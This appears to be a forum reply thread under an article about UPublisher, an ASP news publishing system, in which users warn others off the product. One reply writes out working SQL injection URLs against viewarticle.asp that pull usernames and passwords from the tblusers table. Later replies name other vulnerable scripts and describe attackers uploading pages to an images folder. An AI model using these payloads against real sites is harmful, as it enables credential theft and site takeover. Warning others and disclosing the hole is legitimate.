Replies Back to Article
UPublisher | ASP News Publishing System for UD
Hey Jarke,
One of the problems with having a live demo is that people often feel inclined to try and break it and/or fill it with juvenile comments.
It should be all fixed now.
Shannon
team macromedia ultradev
Please avoid using their UPublisher product .. and likely ALL superfreaker (a.k.a. superf**ked) products.
Do a Google search on "UPublisher exploit" to see the reason why.
http://www.milw0rm.com/exploits/2765
###http://[target]/[path]//viewarticle.asp?ID=[SQL]
Example:
\viewarticle.asp?ID=-1%20union%20select%200,password,username,0,0,0,0%20from%20tblusers
--- OR ---
\viewarticle.asp?ID=-1%20union%20select%200,0,username,password,0,0,0,0,0%20from%20tblusers
LOL - even Superfreaker's DEMO page was hacked:
If your copy of UPublisher has been hacked, be CERTAIN to review / clean the uploads folder at: /images/story_images/
In our case, the hacker was able to upload entire HTML pages ... and then reference them from their browser since they now knew the full URL to their HTML form!
Damn you, StupidFreaker
In regard to the many articles on Google:
http://www.google.com/search?hl=en&q=upublisher+exploit
Superfreaker's "UPublisher" exploit is NOT LIMITED to their "viewarticle.asp" script.
In fact, most of the product is vulnerable to SQL Injection attacks. Some other pages are "index.asp" and "preferences.asp".
Some other UPublisher scripts that CAN be hacked using the SAME METHOD you described above:
sendarticle.asp
printarticle.asp
# # # #